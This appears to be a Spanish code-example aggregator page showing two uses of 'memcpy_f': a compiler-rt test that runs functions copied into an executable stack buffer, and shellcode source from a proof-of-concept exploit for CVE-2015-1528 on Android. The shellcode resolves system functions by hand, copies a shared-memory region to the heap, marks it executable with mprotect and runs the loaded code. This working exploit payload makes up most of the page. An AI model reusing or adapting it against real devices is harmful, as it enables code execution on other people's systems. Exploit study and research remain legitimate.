Ejemplos de memcpy_f en C++ (Cpp)

Ejemplo n.º 1

Archivo: enable_execute_stack_test.c Proyecto: 32bitmicro/riscv-compiler-rt

int main()
{
    unsigned char execution_buffer[128];
    // mark stack page containing execution_buffer to be executable
    __enable_execute_stack(execution_buffer);
	
    // verify you can copy and execute a function
    pfunc f1 = (pfunc)memcpy_f(execution_buffer, func1, 128);
    __clear_cache(execution_buffer, &execution_buffer[128]);
    if ((*f1)() != 1)
        return 1;

    // verify you can overwrite a function with another
    pfunc f2 = (pfunc)memcpy_f(execution_buffer, func2, 128);
    __clear_cache(execution_buffer, &execution_buffer[128]);
    if ((*f2)() != 2)
        return 1;

    return 0;
}

Ejemplo n.º 2

Archivo: shellcode.cpp Proyecto: 0xr0ot/PoCForCVE-2015-1528

//let gcc help us generate shellcode, less asm, hard code dlsym
void shellcode(dlopen_t dlopen_f,void *pos){
    char *str_array = NULL;
    //construct string table in function
    asm __volatile__ ("mov %[result],pc":[result]"=r" (str_array));
    asm __volatile__ ("b .L_strlen_start");
    asm __volatile__ (".align 1");
    asm __volatile__ (".asciz \"printf\"");
    asm __volatile__ (".asciz \"__android_log_print\"");
    asm __volatile__ (".asciz \"mmap\"");
    asm __volatile__ (".asciz \"ashmem_pin_region\"");
    asm __volatile__ (".asciz \"ashmem_unpin_region\"");
    asm __volatile__ (".asciz \"ashmem_get_size_region\"");
    asm __volatile__ (".asciz \"mprotect\"");
    asm __volatile__ (".asciz \"malloc\"");
    asm __volatile__ (".asciz \"memcpy\"");
    asm __volatile__ (".asciz \"fd is %d, %x,%s\\n\"");
    asm __volatile__ (".asciz \"\xff\"");
    asm __volatile__ (".align 1");
    asm __volatile__ (".L_strlen_start:");
    //printf("start exec shellcode\n");
    char *fun_array[50];
    char *p = str_array;
    for(int i=0;i<50;i++){
        if(*p==0xff)
            break;
        fun_array[i]=p;
        while(*p++!=0);
    }
    if((int)dlopen_f%2==0)
        dlopen_f = (dlopen_t)((int)(dlopen_f)+1);
    dlsym_t dlsym_f = (dlsym_t)((int)dlopen_f+8);
    void *handle = dlopen_f(NULL,RTLD_NOW);

    int f = 0;
    printf_t printf_f = (printf_t)dlsym_f(handle,fun_array[f++]);
    #define getaddr(func_name) func_name##_t func_name##_f = (func_name##_t)dlsym_f(handle,fun_array[f++])
    getaddr(__android_log_print);
    getaddr(mmap);
    getaddr(ashmem_pin_region);
    getaddr(ashmem_unpin_region);
    getaddr(ashmem_get_size_region);
    getaddr(mprotect);
    getaddr(malloc);
    getaddr(memcpy);
    int s=9;
    int fd_memory = *(int*)(int(pos)+12);
    int pipe_from_client = *(int*)(int(pos)+16);
    int pipe_to_client = *(int*)(int(pos)+20);
    ashmem_pin_region_f(fd_memory, 0, 0);
    int ashem_size=ashmem_get_size_region_f(fd_memory);
    uint8_t *shm = (uint8_t*)mmap_f(NULL, ashem_size, PROT_READ, MAP_SHARED, fd_memory, 0);
    //ashmem_unpin_region_f(fd_memory, 0, 0);
    //can't mprotect ashmem as read and write, copy it to heap
    char *code = (char*)malloc_f(ashem_size);
    memcpy_f(code, shm, ashem_size);
    mprotect_f((void*)((uint32_t)code&0xfffff000), ashem_size, PROT_READ|PROT_WRITE|PROT_EXEC);
    //printf("start exec load so from memory\n");
    printf_f(fun_array[s],fd_memory,(char*)code,fun_array[s-2]);
    __android_log_print_f(3,fun_array[0],fun_array[s],fd_memory,code,fun_array[s-2]);
    so_start_t so_start = (so_start_t)run_code((char*)code,dlopen_f);
    //mprotect_f((void*)((uint32_t)code&0xfffff000), ashem_size, PROT_READ|PROT_EXEC);
    so_start(pipe_from_client,pipe_to_client);
}